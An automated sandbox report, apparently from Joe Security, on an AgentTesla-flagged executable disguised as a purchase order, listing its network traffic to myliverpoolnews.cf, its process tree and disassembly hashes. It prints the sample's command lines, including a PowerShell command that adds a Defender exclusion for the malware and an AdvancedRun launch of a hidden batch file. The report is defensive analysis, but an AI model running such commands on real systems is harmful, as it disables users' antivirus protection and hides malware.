                                                                                    Apr 8, 2021 12:24:32.258898973 CEST5776253192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 12:24:32.271538973 CEST53577628.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 12:24:35.758364916 CEST5543553192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 12:24:35.776567936 CEST53554358.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 12:24:48.868444920 CEST5071353192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 12:24:48.887140036 CEST53507138.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 12:25:10.328861952 CEST5613253192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 12:25:10.354651928 CEST53561328.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 12:25:37.976799965 CEST5898753192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 12:25:38.001267910 CEST53589878.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 12:25:39.255680084 CEST5657953192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 12:25:39.273714066 CEST53565798.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 12:26:15.222662926 CEST6063353192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 12:26:15.235543966 CEST53606338.8.8.8192.168.2.3
                                                                                    Apr 8, 2021 12:26:19.379484892 CEST6129253192.168.2.38.8.8.8
                                                                                    Apr 8, 2021 12:26:19.405441046 CEST53612928.8.8.8192.168.2.3

                                                                                    DNS Queries

                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                    Apr 8, 2021 12:23:50.030350924 CEST192.168.2.38.8.8.80xa3c7Standard query (0)myliverpoolnews.cfA (IP address)IN (0x0001)
                                                                                    Apr 8, 2021 12:23:50.210664988 CEST192.168.2.38.8.8.80x5299Standard query (0)myliverpoolnews.cfA (IP address)IN (0x0001)

                                                                                    DNS Answers

                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                    Apr 8, 2021 12:23:50.051722050 CEST8.8.8.8192.168.2.30xa3c7No error (0)myliverpoolnews.cf172.67.150.212A (IP address)IN (0x0001)
                                                                                    Apr 8, 2021 12:23:50.051722050 CEST8.8.8.8192.168.2.30xa3c7No error (0)myliverpoolnews.cf104.21.56.119A (IP address)IN (0x0001)
                                                                                    Apr 8, 2021 12:23:50.224140882 CEST8.8.8.8192.168.2.30x5299No error (0)myliverpoolnews.cf172.67.150.212A (IP address)IN (0x0001)
                                                                                    Apr 8, 2021 12:23:50.224140882 CEST8.8.8.8192.168.2.30x5299No error (0)myliverpoolnews.cf104.21.56.119A (IP address)IN (0x0001)

                                                                                    HTTP Request Dependency Graph

                                                                                    • myliverpoolnews.cf

                                                                                    HTTP Packets

                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    0192.168.2.349703172.67.150.21280C:\Users\user\Desktop\08042021New-PurchaseOrder.exe
                                                                                    TimestampkBytes transferredDirectionData
                                                                                    Apr 8, 2021 12:23:50.103962898 CEST940OUTGET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-E349A863A698863617D7B55886FAE832.html HTTP/1.1
                                                                                    UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41
                                                                                    Host: myliverpoolnews.cf
                                                                                    Connection: Keep-Alive
                                                                                    Apr 8, 2021 12:23:50.195653915 CEST941INHTTP/1.1 301 Moved Permanently
                                                                                    Date: Thu, 08 Apr 2021 10:23:50 GMT
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: max-age=3600
                                                                                    Expires: Thu, 08 Apr 2021 11:23:50 GMT
                                                                                    Location: https://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-E349A863A698863617D7B55886FAE832.html
                                                                                    cf-request-id: 09529b876d0000cdbfa7195000000001
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=WCJBx8hERcJIAqHjl%2Bi8%2BixsL9oG4CObGFRIAoVqdbePV4nx8DfVuek8YYN8SziI5qEOSLCyX4JYtrDljLVgQqw%2FznHF1ds89Rzlfhu7nohq7aA%3D"}],"max_age":604800,"group":"cf-nel"}
                                                                                    NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 63cac852499dcdbf-CDG
                                                                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0
                                                                                    Apr 8, 2021 12:23:51.299626112 CEST2253OUTGET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-ADD8B69CFB72A4D5DBAFC5A0A255FA77.html HTTP/1.1
                                                                                    UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41
                                                                                    Host: myliverpoolnews.cf
                                                                                    Apr 8, 2021 12:23:51.334906101 CEST2253INHTTP/1.1 301 Moved Permanently
                                                                                    Date: Thu, 08 Apr 2021 10:23:51 GMT
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: max-age=3600
                                                                                    Expires: Thu, 08 Apr 2021 11:23:51 GMT
                                                                                    Location: https://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-ADD8B69CFB72A4D5DBAFC5A0A255FA77.html
                                                                                    cf-request-id: 09529b8c150000cdbfcc8fa000000001
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=aLEY%2BEnS4BG4xv12NRCilWDALqZwCYuNniwo1v6CysW6ZLzxo7KbvzB4aBAkdzqzDjpRGzsqpqtIzqJal3d45%2F6qBY4R59n5RxOxfTPQ8Cp4TLY%3D"}],"max_age":604800,"group":"cf-nel"}
                                                                                    NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 63cac859bfe2cdbf-CDG
                                                                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0
                                                                                    Apr 8, 2021 12:23:56.045954943 CEST3572OUTGET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-5183A347C7BAD04E3424599E1B978F29.html HTTP/1.1
                                                                                    UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41
                                                                                    Host: myliverpoolnews.cf
                                                                                    Apr 8, 2021 12:23:56.079735041 CEST3573INHTTP/1.1 301 Moved Permanently
                                                                                    Date: Thu, 08 Apr 2021 10:23:56 GMT
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: max-age=3600
                                                                                    Expires: Thu, 08 Apr 2021 11:23:56 GMT
                                                                                    Location: https://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-5183A347C7BAD04E3424599E1B978F29.html
                                                                                    cf-request-id: 09529b9e9f0000cdbf9fbfa000000001
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=97Le03BnatOCgR4SbWMWmhHMLzkEP16zTn7mEoWV1jeHIkiq1rtG6w8rZxl4YhJbqWEai4KACNehTkeiUeMcEynI5e%2BRPIy3hT8qpxRkfg%2FZ%2FhM%3D"}],"max_age":604800,"group":"cf-nel"}
                                                                                    NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 63cac877697ecdbf-CDG
                                                                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    HTTPS Packets

                                                                                    TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                    Apr 8, 2021 12:23:50.351607084 CEST172.67.150.212443192.168.2.349704CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=California, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEWed Mar 31 02:00:00 CEST 2021 Mon Jan 27 13:48:08 CET 2020Thu Mar 31 01:59:59 CEST 2022 Wed Jan 01 00:59:59 CET 2025769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,054328bd36c14bd82ddaa0c04b25ed9ad
                                                                                    CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025

                                                                                    Code Manipulations

                                                                                    Statistics

                                                                                    CPU Usage

                                                                                    Click to jump to process

                                                                                    Memory Usage

                                                                                    Click to jump to process

                                                                                    High Level Behavior Distribution

                                                                                    Click to dive into process behavior distribution

                                                                                    Behavior

                                                                                    Click to jump to process

                                                                                    System Behavior

                                                                                    Analysis Process: 08042021New-PurchaseOrder.exe PID: 4952 Parent PID: 5680

                                                                                    General

                                                                                    Start time:12:23:48
                                                                                    Start date:08/04/2021
                                                                                    Path:C:\Users\user\Desktop\08042021New-PurchaseOrder.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:'C:\Users\user\Desktop\08042021New-PurchaseOrder.exe'
                                                                                    Imagebase:0x140000
                                                                                    File size:32008 bytes
                                                                                    MD5 hash:27233176A2A979195B01A53EC16C7631
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:.Net C# or VB.NET
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.291099995.0000000003543000.00000004.00000001.sdmp, Author: Joe Security
                                                                                    Reputation:low

                                                                                    Chronological Activities

                                                                                    Analysis Process: AdvancedRun.exe PID: 4436 Parent PID: 4952

                                                                                    General

                                                                                    Start time:12:24:02
                                                                                    Start date:08/04/2021
                                                                                    Path:C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:'C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                                                                                    Imagebase:0x400000
                                                                                    File size:91000 bytes
                                                                                    MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Antivirus matches:
                                                                                    • Detection: 3%, Metadefender, Browse
                                                                                    • Detection: 0%, ReversingLabs
                                                                                    Reputation:moderate

                                                                                    Chronological Activities

                                                                                    Analysis Process: AdvancedRun.exe PID: 5744 Parent PID: 4436

                                                                                    General

                                                                                    Start time:12:24:06
                                                                                    Start date:08/04/2021
                                                                                    Path:C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:'C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe' /SpecialRun 4101d8 4436
                                                                                    Imagebase:0x400000
                                                                                    File size:91000 bytes
                                                                                    MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:moderate

                                                                                    Chronological Activities

                                                                                    Analysis Process: powershell.exe PID: 5828 Parent PID: 4952

                                                                                    General

                                                                                    Start time:12:24:11
                                                                                    Start date:08/04/2021
                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\08042021New-PurchaseOrder.exe' -Force
                                                                                    Imagebase:0x100000
                                                                                    File size:430592 bytes
                                                                                    MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:.Net C# or VB.NET
                                                                                    Reputation:high

                                                                                    Chronological Activities

                                                                                    Analysis Process: conhost.exe PID: 5868 Parent PID: 5828

                                                                                    General

                                                                                    Start time:12:24:12
                                                                                    Start date:08/04/2021
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff6b2800000
                                                                                    File size:625664 bytes
                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high

                                                                                    Chronological Activities

                                                                                    Analysis Process: powershell.exe PID: 3636 Parent PID: 4952

                                                                                    General

                                                                                    Start time:12:24:12
                                                                                    Start date:08/04/2021
                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\08042021New-PurchaseOrder.exe' -Force
                                                                                    Imagebase:0x100000
                                                                                    File size:430592 bytes
                                                                                    MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:.Net C# or VB.NET
                                                                                    Reputation:high

                                                                                    Chronological Activities

                                                                                    Analysis Process: conhost.exe PID: 5904 Parent PID: 3636

                                                                                    General

                                                                                    Start time:12:24:12
                                                                                    Start date:08/04/2021
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff6b2800000
                                                                                    File size:625664 bytes
                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high

                                                                                    Chronological Activities

                                                                                    Analysis Process: cmd.exe PID: 1928 Parent PID: 4952

                                                                                    General

                                                                                    Start time:12:24:12
                                                                                    Start date:08/04/2021
                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:'C:\Windows\System32\cmd.exe' /c timeout 1
                                                                                    Imagebase:0xd10000
                                                                                    File size:232960 bytes
                                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high

                                                                                    Chronological Activities

                                                                                    Analysis Process: conhost.exe PID: 6224 Parent PID: 1928

                                                                                    General

                                                                                    Start time:12:24:18
                                                                                    Start date:08/04/2021
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff6b2800000
                                                                                    File size:625664 bytes
                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high

                                                                                    Chronological Activities

                                                                                    Analysis Process: timeout.exe PID: 6284 Parent PID: 1928

                                                                                    General

                                                                                    Start time:12:24:18
                                                                                    Start date:08/04/2021
                                                                                    Path:C:\Windows\SysWOW64\timeout.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:timeout 1
                                                                                    Imagebase:0x1220000
                                                                                    File size:26112 bytes
                                                                                    MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high

                                                                                    Chronological Activities

                                                                                    Analysis Process: 08042021New-PurchaseOrder.exe PID: 6388 Parent PID: 4952

                                                                                    General

                                                                                    Start time:12:24:22
                                                                                    Start date:08/04/2021
                                                                                    Path:C:\Users\user\Desktop\08042021New-PurchaseOrder.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Users\user\Desktop\08042021New-PurchaseOrder.exe
                                                                                    Imagebase:0xfa0000
                                                                                    File size:32008 bytes
                                                                                    MD5 hash:27233176A2A979195B01A53EC16C7631
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:.Net C# or VB.NET
                                                                                    Reputation:low

                                                                                    Chronological Activities

                                                                                    Analysis Process: WerFault.exe PID: 6460 Parent PID: 4952

                                                                                    General

                                                                                    Start time:12:24:24
                                                                                    Start date:08/04/2021
                                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4952 -s 2784
                                                                                    Imagebase:0x1320000
                                                                                    File size:434592 bytes
                                                                                    MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:.Net C# or VB.NET
                                                                                    Reputation:high

                                                                                    Chronological Activities

                                                                                    Analysis Process: SWqTT.exe PID: 3064 Parent PID: 3388

                                                                                    General

                                                                                    Start time:12:24:56
                                                                                    Start date:08/04/2021
                                                                                    Path:C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:'C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe'
                                                                                    Imagebase:0x810000
                                                                                    File size:32008 bytes
                                                                                    MD5 hash:27233176A2A979195B01A53EC16C7631
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:.Net C# or VB.NET
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000020.00000002.486317190.0000000006341000.00000004.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000020.00000002.487748726.000000000645C000.00000004.00000001.sdmp, Author: Joe Security
                                                                                    Antivirus matches:
                                                                                    • Detection: 15%, ReversingLabs
                                                                                    Reputation:low

                                                                                    Chronological Activities

                                                                                    Analysis Process: SWqTT.exe PID: 5192 Parent PID: 3388

                                                                                    General

                                                                                    Start time:12:25:05
                                                                                    Start date:08/04/2021
                                                                                    Path:C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:'C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe'
                                                                                    Imagebase:0xdf0000
                                                                                    File size:32008 bytes
                                                                                    MD5 hash:27233176A2A979195B01A53EC16C7631
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:.Net C# or VB.NET
                                                                                    Reputation:low

                                                                                    Chronological Activities

                                                                                    Analysis Process: AdvancedRun.exe PID: 5204 Parent PID: 3064

                                                                                    General

                                                                                    Start time:12:25:10
                                                                                    Start date:08/04/2021
                                                                                    Path:C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:'C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                                                                                    Imagebase:0x400000
                                                                                    File size:91000 bytes
                                                                                    MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Antivirus matches:
                                                                                    • Detection: 3%, Metadefender, Browse
                                                                                    • Detection: 0%, ReversingLabs
                                                                                    Reputation:moderate

                                                                                    Chronological Activities

                                                                                    Analysis Process: AdvancedRun.exe PID: 7116 Parent PID: 5192

                                                                                    General

                                                                                    Start time:12:25:25
                                                                                    Start date:08/04/2021
                                                                                    Path:C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:'C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                                                                                    Imagebase:0x400000
                                                                                    File size:91000 bytes
                                                                                    MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Antivirus matches:
                                                                                    • Detection: 3%, Metadefender, Browse
                                                                                    • Detection: 0%, ReversingLabs

                                                                                    Chronological Activities

                                                                                    Analysis Process: AdvancedRun.exe PID: 5304 Parent PID: 5204

                                                                                    General

                                                                                    Start time:12:25:30
                                                                                    Start date:08/04/2021
                                                                                    Path:C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:'C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe' /SpecialRun 4101d8 5204
                                                                                    Imagebase:0x400000
                                                                                    File size:91000 bytes
                                                                                    MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language

                                                                                    Chronological Activities

                                                                                    Disassembly

                                                                                    Code Analysis

                                                                                    Reset < >

                                                                                      Analysis Process: 08042021New-PurchaseOrder.exe PID: 4952 Parent PID: 5680 08042021New-PurchaseOrder.exeCOMMON

                                                                                      Executed Functions

                                                                                      Function 00A244E0, Relevance: 6.8, Strings: 5, Instructions: 570COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.288245534.0000000000A20000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: false
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: \qr$\qr$\qr$\qr$\qr
                                                                                      • API String ID: 0-3777105096
                                                                                      • Opcode ID: d10ceda69ad9cac425dc50a34982f4894a50c0a658ca421f4f981b6f8e1b0ed1
                                                                                      • Instruction ID: 2f9df74c7236b6a1512f96ab4d0b0ea23cb080047483049d9c4bfb74c7469ec9
                                                                                      • Opcode Fuzzy Hash: d10ceda69ad9cac425dc50a34982f4894a50c0a658ca421f4f981b6f8e1b0ed1
                                                                                      • Instruction Fuzzy Hash: B722BE30A002699FCB14DF68D854AAEBBF2BF89304F158469E509EB395DF34DD42CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00A2CBB0, Relevance: 4.6, Strings: 2, Instructions: 2056COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.288245534.0000000000A20000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: false
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: .st}{ mnlFX/$/"a.st}{ mnlFX/
                                                                                      • API String ID: 0-928898513
                                                                                      • Opcode ID: 969dbea4de86cfa6c6636ff47f85e86f6cb0a44f7b6e4a07fd54ec6b65515c46
                                                                                      • Instruction ID: 31c5ca099bbef88635753d01eec0e5cfafd73c8fec3df7e6e25247720d6aba9d
                                                                                      • Opcode Fuzzy Hash: 969dbea4de86cfa6c6636ff47f85e86f6cb0a44f7b6e4a07fd54ec6b65515c46
                                                                                      • Instruction Fuzzy Hash: 8F037054E652208CCB359F089398A6D26F2AF4539CF56A1BBC0541F636E3F5C988C78F
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00A2CBA0, Relevance: 4.5, Strings: 2, Instructions: 2049COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.288245534.0000000000A20000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: false
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: .st}{ mnlFX/$/"a.st}{ mnlFX/
                                                                                      • API String ID: 0-928898513
                                                                                      • Opcode ID: 5c3e3bac0ebbf0ce14bcecb9a31bd96c06c4f3744ccefec41deac2519d79b293
                                                                                      • Instruction ID: 51d5a9ebb9f84b774804cccfddff953f556c8b5fe19583566f7e6e1f42c37b8a
                                                                                      • Opcode Fuzzy Hash: 5c3e3bac0ebbf0ce14bcecb9a31bd96c06c4f3744ccefec41deac2519d79b293
                                                                                      • Instruction Fuzzy Hash: 68036F54E652208CCB359F089398A6D26F2AF4539CF56A1BBC0541F636E3F5C988C78F
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00A24C58, Relevance: .4, Instructions: 351COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.288245534.0000000000A20000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: false
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 74ff050b244e7f6ebb32c75021e79d1b41aeb27476a25fd40582296d964f2206
                                                                                      • Instruction ID: 05cd1bfa0b36b8bef30ced3bbcd2749b3363d44cd67bf2c7a42133f45f0ef91b
                                                                                      • Opcode Fuzzy Hash: 74ff050b244e7f6ebb32c75021e79d1b41aeb27476a25fd40582296d964f2206
                                                                                      • Instruction Fuzzy Hash: 82E13B31A04129DFCB14CFADE984AADBBF2BF89700F25806AE805EB261D735DC45CB51
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00A239D0, Relevance: 6.7, Strings: 5, Instructions: 439COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.288245534.0000000000A20000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: false
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: \qr$\qr$\qr$\qr$\qr
                                                                                      • API String ID: 0-3777105096
                                                                                      • Opcode ID: 00192e649c70dab235c84c3adb77a588eeae751e676ec6b2058536db47ee8eee
                                                                                      • Instruction ID: c2fc72b94e0dbcc9a026800fc30ea02734629d4cc5c5fcb77c74ccbacd34e501
                                                                                      • Opcode Fuzzy Hash: 00192e649c70dab235c84c3adb77a588eeae751e676ec6b2058536db47ee8eee
                                                                                      • Instruction Fuzzy Hash: 54E1E1317042249FCF189F28E858B7E3BB6AB89354F158438E606CB394CF79CE468791
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00A2A530, Relevance: 3.0, Strings: 1, Instructions: 1773COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.288245534.0000000000A20000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: false
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Zul
                                                                                      • API String ID: 0-1547176656
                                                                                      • Opcode ID: 9afbea2e7f5e78e7c45839ff53fd7d80c81ef5fd18fb4dc41b49847db06b620d
                                                                                      • Instruction ID: 902e6adffebc15ba156d69519b4562ae348b7fcc0ec27f7c0155aed6bffd1c10
                                                                                      • Opcode Fuzzy Hash: 9afbea2e7f5e78e7c45839ff53fd7d80c81ef5fd18fb4dc41b49847db06b620d
                                                                                      • Instruction Fuzzy Hash: 39F2A595E2173088C7359F0891D9A6D36E2AF47398F56A1FBC4660F636E3B1448DCB0B
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00A2A522, Relevance: 3.0, Strings: 1, Instructions: 1772COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.288245534.0000000000A20000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: false
                                                                                      Similarity
                                                                                      • API ID:
